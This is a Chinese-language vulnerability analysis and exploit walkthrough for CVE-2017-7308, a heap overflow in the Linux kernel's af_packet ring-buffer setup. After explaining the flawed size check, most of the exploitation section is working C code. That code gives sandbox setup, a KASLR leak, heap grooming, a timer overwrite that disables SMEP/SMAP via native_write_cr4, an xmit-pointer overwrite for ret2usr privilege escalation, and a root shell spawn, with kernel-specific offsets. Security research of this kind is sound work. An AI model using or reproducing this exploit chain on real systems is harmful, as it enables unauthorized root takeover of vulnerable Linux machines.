1. 前言
此漏洞存在于Linux Kernel 4.10.6
及以下的版本中,本文的测试环境为Ubuntu 14.04 LTS
$ git clone git://kernel.ubuntu.com/ubuntu/ubuntu-trusty.git
$ git checkout Ubuntu-lts-4.4.0-31.50_14.04.1
2. 漏洞分析
漏洞发生在net/packet/af_packet.c
的packet_set_ring
函数中,此函数会在设置ring buffer
时被调用,ring buffer
是用于数据包处理的缓冲区,rx_ring
是接收数据的缓冲区,tx_ring
是传输数据的缓冲区,本文用到rx_ring
,分别可以通过setsockopt
的PACKET_RX_RING
和PACKET_TX_RING
参数进行设置, packet_ring_buffer
定义如下:
/*
 * Ring buffer state of a packet socket, reduced to the two members this
 * write-up relies on.
 * NOTE(review): the kernel definition presumably has further members —
 * confirm against the kernel sources before reusing this layout.
 */
struct packet_ring_buffer {
	struct pgv *pg_vec;			/* indexed per block: pg_vec[i].buffer */
	struct tpacket_kbdq_core prb_bdqc;	/* block-queue core state */
};
/* One ring-buffer block; `buffer` points at the start of the block's memory. */
struct pgv {
	char *buffer;
};
接下来看导致漏洞的代码
if (po->tp_version >= TPACKET_V3 &&
(int)(req->tp_block_size -
BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)
goto out;
当PACKET_VERSION
为TPACKET_V3
时,(int)(req->tp_block_size - BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0
这个检测可以被绕过:无符号减法的结果回绕后再转换为int,仍可能是正数,例如:
A = req->tp_block_size = 4096 = 0x1000
B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000
BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030
A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0
(int)0x7fffffd0 = 0x7fffffd0 > 0
这样就会在之后导致一系列问题,在init_prb_bdqc
函数中
/*
 * Initialise the block-queue core of ring buffer @rb from the user request
 * @req_u, then open the first block.
 *
 * @po:     packet socket owning the ring; handed to the retire-timer setup
 * @rb:     ring buffer whose block-queue core is (re)initialised
 * @pg_vec: block array; pg_vec[0].buffer becomes the first open block
 * @req_u:  user request supplying tp_block_size, tp_block_nr, tp_sizeof_priv
 */
static void init_prb_bdqc(struct packet_sock *po,
			  struct packet_ring_buffer *rb,
			  struct pgv *pg_vec,
			  union tpacket_req_u *req_u)
{
	struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
	struct tpacket_block_desc *pbd;

	memset(p1, 0x0, sizeof(*p1));
	p1->knxt_seq_num = 1;
	p1->pkbdq = pg_vec;
	pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;
	p1->pkblk_start = pg_vec[0].buffer;
	p1->kblk_size = req_u->req3.tp_block_size;
	p1->knum_blocks = req_u->req3.tp_block_nr;
	...
	/*
	 * Per the surrounding write-up, blk_sizeof_priv is an unsigned short
	 * while tp_sizeof_priv is an unsigned int, so only the low 16 bits of
	 * the user value are kept here.
	 */
	p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;
	/*
	 * If BLK_PLUS_PRIV(blk_sizeof_priv) exceeds kblk_size this subtraction
	 * yields a very large max_frame_len.
	 */
	p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);
	prb_init_ft_ops(p1, req_u);
	prb_setup_retire_blk_timer(po);
	prb_open_block(p1, pbd);
}
p1->blk_sizeof_priv
的类型为unsigned short
,而req_u->req3.tp_sizeof_priv
的类型为unsigned int
,在转换后只会取低两个字节的值,由于之前的检测绕过问题这里可以给p1->blk_sizeof_priv
赋任意值,这样如果BLK_PLUS_PRIV(p1->blk_sizeof_priv) > p1->kblk_size
就可以把p1->max_frame_len
赋值为一个很大的值来绕过很多检测,在之后的prb_open_block
函数中
/*
 * Open block pbd1 (excerpt): record the block's start address and compute
 * the position at which the next frame will be stored.
 */
static void prb_open_block(struct tpacket_kbdq_core *pkc1,
struct tpacket_block_desc *pbd1)
{
...
pkc1->pkblk_start = (char *)pbd1;
/* Next frame goes BLK_PLUS_PRIV(blk_sizeof_priv) bytes past the block start. */
pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);
...
}
pkc1->nxt_offset
指向缓冲区ring_buffer
中block
当前可接收数据的起始地址,由于pkc1->blk_sizeof_priv
可控,因此可以控制pkc1->nxt_offset
在接收数据包时造成堆越界。
3. 漏洞利用
EXP参考https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c,由于测试环境的内核版本是4.4
,因此需要修改几处偏移。主要思路是通过堆越界覆盖packet_sock
结构体中的成员packet_sock->xmit
和packet_sock->rx_ring->prb_bdqc->retire_blk_timer
,因此进行堆布局构造连续的多个packet_sock
结构体使前一个packet_sock->rx_ring->prb_bdqc->nxt_offset
指向后面的packet_sock
结构体的上面两个成员。
3.1 安装沙盒
要对更底层的网络进行操作,需要有CAP_NET_RAW
权限,可以通过用户命名空间(user namespace)配合网络命名空间来实现,编译内核时需要开启CONFIG_USER_NS=y
/*
 * Enter new user and network namespaces, map the caller's uid/gid to 0
 * inside them, pin the process to CPU 0 and bring the loopback interface up.
 * Any failing step prints a diagnostic and terminates the process.
 */
void setup_sandbox(void) {
	/* Capture the ids first; they are needed for the id maps written below. */
	int real_uid = getuid();
	int real_gid = getgid();

	if (unshare(CLONE_NEWUSER) != 0) {
		perror("[-] unshare(CLONE_NEWUSER)");
		exit(EXIT_FAILURE);
	}

	if (unshare(CLONE_NEWNET) != 0) {
		perror("[-] unshare(CLONE_NEWNET)");
		exit(EXIT_FAILURE);
	}

	/*
	 * setgroups has to be denied before an unprivileged process may write
	 * gid_map (see user_namespaces(7)).
	 */
	if (!write_file("/proc/self/setgroups", "deny")) {
		perror("[-] write_file(/proc/self/setgroups)");
		exit(EXIT_FAILURE);
	}

	if (!write_file("/proc/self/uid_map", "0 %d 1\n", real_uid)) {
		perror("[-] write_file(/proc/self/uid_map)");
		exit(EXIT_FAILURE);
	}

	if (!write_file("/proc/self/gid_map", "0 %d 1\n", real_gid)) {
		perror("[-] write_file(/proc/self/gid_map)");
		exit(EXIT_FAILURE);
	}

	/* Restrict the process to CPU 0. */
	cpu_set_t my_set;
	CPU_ZERO(&my_set);
	CPU_SET(0, &my_set);
	if (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {
		perror("[-] sched_setaffinity()");
		exit(EXIT_FAILURE);
	}

	/*
	 * NOTE(review): system() returns the command's exit status, so errno
	 * may not describe why ifconfig failed.
	 */
	if (system("/sbin/ifconfig lo up") != 0) {
		perror("[-] system(/sbin/ifconfig lo up)");
		exit(EXIT_FAILURE);
	}
}
3.2 绕过KASLR
由于没有对dmesg
做限制,因此会有残留的syslog
能够泄漏出内核地址
$ dmesg | grep 'Freeing SMP'
[ 0.022785] Freeing SMP alternatives memory: 28K (ffffffff81e83000 - ffffffff81e8a000)
3.3 堆布局
packet_sock
结构体会在用户层创建socket
时在内核创建,它通过kmalloc
分配空间,kmalloc
底层通过slab allocator
进行分配,而为了提升性能减少重复的申请和释放,会用多个slab
组成一个对应特定大小的缓存,在释放操作时并不会真正的释放,而是放回缓存并标记为未使用状态,等下一次有相同大小的内存申请时直接从缓存返回,而不需要再次真正的申请物理内存,每个缓存对应的对象大小为2^n
,4.4
版本内核的packet_sock
大小为1408
$ pahole -C packet_sock src/ubuntu-trusty/vmlinux
struct packet_sock {
struct sock sk; /* 0 704 */
/* --- cacheline 11 boundary (704 bytes) --- */
struct packet_fanout * fanout; /* 704 8 */
union tpacket_stats_u stats; /* 712 12 */
/* XXX 4 bytes hole, try to pack */
struct packet_ring_buffer rx_ring; /* 728 232 */
/* --- cacheline 15 boundary (960 bytes) --- */
struct packet_ring_buffer tx_ring; /* 960 232 */
/* --- cacheline 18 boundary (1152 bytes) was 40 bytes ago --- */
int copy_thresh; /* 1192 4 */
spinlock_t bind_lock; /* 1196 4 */
struct mutex pg_vec_lock; /* 1200 40 */
/* --- cacheline 19 boundary (1216 bytes) was 24 bytes ago --- */
unsigned int running:1; /* 1240:31 4 */
unsigned int auxdata:1; /* 1240:30 4 */
unsigned int origdev:1; /* 1240:29 4 */
unsigned int has_vnet_hdr:1; /* 1240:28 4 */
/* XXX 28 bits hole, try to pack */
int pressure; /* 1244 4 */
int ifindex; /* 1248 4 */
__be16 num; /* 1252 2 */
/* XXX 2 bytes hole, try to pack */
struct packet_rollover * rollover; /* 1256 8 */
struct packet_mclist * mclist; /* 1264 8 */
atomic_t mapped; /* 1272 4 */
enum tpacket_versions tp_version; /* 1276 4 */
/* --- cacheline 20 boundary (1280 bytes) --- */
unsigned int tp_hdrlen; /* 1280 4 */
unsigned int tp_reserve; /* 1284 4 */
unsigned int tp_loss:1; /* 1288:31 4 */
unsigned int tp_tx_has_off:1; /* 1288:30 4 */
/* XXX 30 bits hole, try to pack */
unsigned int tp_tstamp; /* 1292 4 */
struct net_device * cached_dev; /* 1296 8 */
int (*xmit)(struct sk_buff *); /* 1304 8 */
/* XXX 32 bytes hole, try to pack */
/* --- cacheline 21 boundary (1344 bytes) --- */
struct packet_type prot_hook; /* 1344 56 */
/* size: 1408, cachelines: 22, members: 27 */
/* sum members: 1362, holes: 3, sum holes: 38 */
/* bit holes: 2, sum bit holes: 58 bits */
/* padding: 8 */
};
因此1024 < 1408 < 2048
,packet_sock
会使用kmalloc-2048
缓存,这个缓存使用0x8000
大小的slab
,这样先申请512
个socket
使kmalloc-2048
缓存耗尽,再创建一个有1024
个块大小为0x8000
的ring_buffer
的packet_sock
,申请block
会使page allocator
的freelist
中的相应大小的页耗尽,因为申请物理页的大小也是按2^n
计算,这样之后再申请就会从第一个大于n
的m
且freelist
中不为空的2^m
大小的页中分割内存
/* Number of packet sockets allocated up front to exhaust the kmalloc-2048 cache. */
#define KMALLOC_PAD 512
/* Number of 0x8000-byte ring blocks allocated up front to drain the page allocator freelist. */
#define PAGEALLOC_PAD 1024
kmalloc_pad(KMALLOC_PAD);
pagealloc_pad(PAGEALLOC_PAD);
3.4 绕过SMEP和SMAP
完成预热后申请一个packet_sock
并且设置一个有两个块大小为0x8000
的ring_buffer
,再申请多个连续的packet_sock
,由于kmalloc-2048
缓存和freelist
中相应大小的页中都已耗尽,这样它们会有很大机会在更大的页上被连续地分配。
绕过SMEP
和SMAP
只需把CR4
寄存器的第20
和21
位赋值为0
具体代码如下:
/* Offset added to KERNEL_BASE to obtain the address of native_write_cr4 (specific to the tested kernel build). */
#define NATIVE_WRITE_CR4 0x61220ul
/* CR4 value to write: bits 20 (SMEP) and 21 (SMAP) are clear. */
#define CR4_DESIRED_VALUE 0x407f0ul
/* Byte offset of retire_blk_timer inside struct packet_sock — NOTE(review): confirm for the target kernel. */
#define TIMER_OFFSET 880
/*
 * Create a packet socket whose RX ring has two 0x8000-byte blocks and a
 * crafted tp_sizeof_priv, so that received data lands `offset` bytes past
 * the end of a block.
 *
 * The two top bits of the private size are set to get past the kernel's
 * signed size check; the low part positions the write.
 *
 * Returns whatever packet_socket_setup() returns.
 */
int oob_setup(int offset) {
	const unsigned int mac_len = ETH_HDR_LEN;

	/* Reserve at least 16 bytes for the link-layer header. */
	unsigned int l2_room = mac_len;
	if (l2_room < 16)
		l2_room = 16;

	const unsigned int net_off = TPACKET_ALIGN(TPACKET3_HDRLEN + l2_room);
	const unsigned int mac_off = net_off - mac_len;

	unsigned int priv_size = (1u << 31) + (1u << 30);
	priv_size += 0x8000 - BLK_HDR_LEN - mac_off + offset;

	return packet_socket_setup(0x8000, 2048, 2, priv_size, 100);
}
/*
 * Overwrite the retire timer of a neighbouring packet socket so that
 * func(arg) is invoked when the timer fires.
 *
 * @func: address stored in the fake timer's `function` field
 * @arg:  value stored in the fake timer's `data` field
 */
void oob_timer_execute(void *func, unsigned long arg) {
	/* Aim the out-of-bounds write 8 bytes in front of the victim's timer. */
	oob_setup(2048 + TIMER_OFFSET - 8);

	/* Allocate 32 packet sockets, each with a retire timer scheduled. */
	for (int n = 0; n < 32; n++) {
		int victim = packet_sock_kmalloc();
		packet_sock_timer_schedule(victim, 1000);
	}

	char payload[2048];
	memset(payload, 0, sizeof(payload));

	/* Build the fake timer 8 bytes into the payload. */
	struct timer_list *fake = (struct timer_list *)(payload + 8);
	fake->function = func;
	fake->data = arg;
	fake->flags = 1;

	/* The first two payload bytes are skipped when sending. */
	oob_write(payload + 2, sizeof(*fake) + 8 - 2);

	/* Wait so that the overwritten timer gets a chance to expire. */
	sleep(1);
}
/* Have the overwritten retire timer call native_write_cr4(CR4_DESIRED_VALUE). */
oob_timer_execute((void *)(KERNEL_BASE + NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);
这里是覆盖packet_sock->rx_ring->prb_bdqc->retire_blk_timer
,由于会在retire timer
超时后调用retire_blk_timer->function(retire_blk_timer->data)
,这样就可以通过native_write_cr4(X)
来绕过SMEP
和SMAP
。另外再说一下sizeof_priv
的计算,tpacket
接收数据包时会调用tpacket_rcv
函数
/*
 * Receive-path excerpt: obtain a frame slot from the RX ring and copy the
 * packet data into it.
 */
static int tpacket_rcv(struct sk_buff *skb, struct net_device *dev,
struct packet_type *pt, struct net_device *orig_dev)
{
...
/* Request a slot for macoff + snaplen bytes. */
h.raw = packet_current_rx_frame(po, skb, TP_STATUS_KERNEL, (macoff+snaplen));
...
/* Copy snaplen bytes of the skb to macoff bytes past the slot start. */
skb_copy_bits(skb, 0, h.raw + macoff, snaplen);
...
}
/*
 * Return the location for the next received frame (excerpt); the lookup
 * depends on the socket's tp_version.
 */
static void *packet_current_rx_frame(struct packet_sock *po,
struct sk_buff *skb,
int status, unsigned int len)
{
char *curr = NULL;
switch (po->tp_version) {
...
case TPACKET_V3:
/* TPACKET_V3 delegates to the block-based lookup. */
return __packet_lookup_frame_in_block(po, skb, status, len);
...
}
}
/*
 * Find room for a frame of `len` bytes in the RX ring (excerpt): use the
 * current block if the frame fits before its end, otherwise retire it and
 * try the next block.
 */
static void *__packet_lookup_frame_in_block(struct packet_sock *po,
struct sk_buff *skb,
int status,
unsigned int len
)
{
struct tpacket_kbdq_core *pkc;
struct tpacket_block_desc *pbd;
char *curr, *end;
pkc = GET_PBDQC_FROM_RB(&po->rx_ring);
pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
...
/* Candidate write position inside the current block. */
curr = pkc->nxt_offset;
pkc->skb = skb;
/* End of the current block: block start plus kblk_size. */
end = (char *)pbd + pkc->kblk_size;
/* first try the current block */
if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {
prb_fill_curr_block(curr, pkc, pbd, len);
return (void *)curr;
}
/* Ok, close the current block */
prb_retire_current_block(pkc, po, 0);
/* Now, try to dispatch the next block */
curr = (char *)prb_dispatch_next_block(pkc, po);
if (curr) {
/* No bounds check is visible on this path before the slot is filled. */
pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);
prb_fill_curr_block(curr, pkc, pbd, len);
return (void *)curr;
}
...
}
/*
 * Open the next block (excerpt) and return the nxt_offset that
 * prb_open_block() computed for it.
 */
static void *prb_dispatch_next_block(struct tpacket_kbdq_core *pkc,
struct packet_sock *po)
{
...
prb_open_block(pkc, pbd);
return (void *)pkc->nxt_offset;
}
__packet_lookup_frame_in_block
会返回当前缓冲区中可接收数据的起始地址,由于nxt_offset已被移到块尾之外,条件curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end不成立
,之后就会从第二个块中找空余的空间(这也是上面创建两个块的原因),blk_sizeof_priv = 0x8000 - BLK_HDR_LEN - macoff + 2048 + TIMER_OFFSET - 8
会在计算p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv)
时使p1->max_frame_len
为一个很大的值以此来绕过后面的一些检测,h.raw = pg_vec[1].buffer + blk_sizeof_priv + BLK_HDR_LEN = pg_vec[1].buffer + 0x8000 - macoff + 2048 + TIMER_OFFSET - 8
,调用skb_copy_bits(skb, 0, h.raw + macoff, snaplen)
把数据复制到缓存区时的起始地址为pg_vec[1].buffer + 0x8000 + 2048 + TIMER_OFFSET - 8
,跳过后面紧跟的一个packet_sock
,这样最终的复制起始地址为后面紧跟的第二个packet_sock + TIMER_OFFSET - 6
(由于对齐导致是-6
,为了把一些值置为0)
0xffff8800346c0b6a
刚好在前面创建的32
个packet_sock
中
memcpy
后成功覆盖了retire_blk_timer
3.5 提权
跟上一步类似只是这里覆盖packet_sock
的xmit
函数指针,它会在发送数据时被调用,在关闭SMEP
后内核可以直接跳转到用户空间的代码(ret2usr),由其执行commit_creds(prepare_kernel_cred(0))
实现提权
/* Byte offset of the xmit function pointer inside struct packet_sock (1304 in the pahole layout of the tested 4.4 build). */
#define XMIT_OFFSET 1304
/*
 * Overwrite the xmit function pointer of a neighbouring packet socket with
 * @func, then trigger every sprayed socket so that the overwritten one
 * calls it.
 *
 * @func: address written over packet_sock->xmit
 */
void oob_id_match_execute(void *func) {
	enum { SPRAY_COUNT = 32 };

	/*
	 * Aim the out-of-bounds write 64 bytes in front of the victim's xmit.
	 * The socket returned by oob_setup() is not used again here.
	 */
	(void)oob_setup(2048 + XMIT_OFFSET - 64);

	/* Allocate the packet sockets that are candidates for the overwrite. */
	int ps[SPRAY_COUNT];
	for (int i = 0; i < SPRAY_COUNT; i++) {
		ps[i] = packet_sock_kmalloc();
	}

	char buffer[2048];
	memset(buffer, 0, sizeof(buffer));

	/* Place the new pointer 64 bytes into the payload. */
	void **xmit = (void **)&buffer[64];
	*xmit = func;

	/* The first two payload bytes are skipped when sending. */
	oob_write(buffer + 2, sizeof(*xmit) + 64 - 2);

	/* Which socket was hit is unknown, so trigger all of them. */
	for (int i = 0; i < SPRAY_COUNT; i++) {
		packet_sock_id_match_trigger(ps[i]);
	}
}
/* Redirect a packet socket's xmit pointer to the userland get_root_payload. */
oob_id_match_execute((void *)&get_root_payload);
3.6 恢复网络
由于隔离了网络命名空间,导致只有一个回环接口,不能连接网络,
但是现在是root
权限,因此可以加入到init
进程的网络命名空间来恢复网络
/*
 * Join the network namespace of PID 1 and replace the current process with
 * an interactive bash.
 *
 * Exits with EXIT_FAILURE if the namespace file cannot be opened or joined.
 * If execve() itself fails, a diagnostic is printed and the function returns.
 */
void exec_shell(void) {
	char *shell = "/bin/bash";
	char *args[] = {shell, "-i", NULL};

	int fd = open("/proc/1/ns/net", O_RDONLY);
	if (fd == -1) {
		perror("error opening /proc/1/ns/net");
		exit(EXIT_FAILURE);
	}

	if (setns(fd, CLONE_NEWNET) == -1) {
		perror("error calling setns");
		exit(EXIT_FAILURE);
	}

	/* The namespace is joined; do not leak the descriptor into the shell. */
	close(fd);

	execve(shell, args, NULL);

	/* execve() only returns on failure. */
	perror("error calling execve");
}
4. 参考
- https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
- https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c
- https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308
- http://blog.nsfocus.net/gdb-kgdb-debug-application/
- http://blackbunny.io/linux-kernel-x86-64-bypass-smep-kaslr-kptr_restric/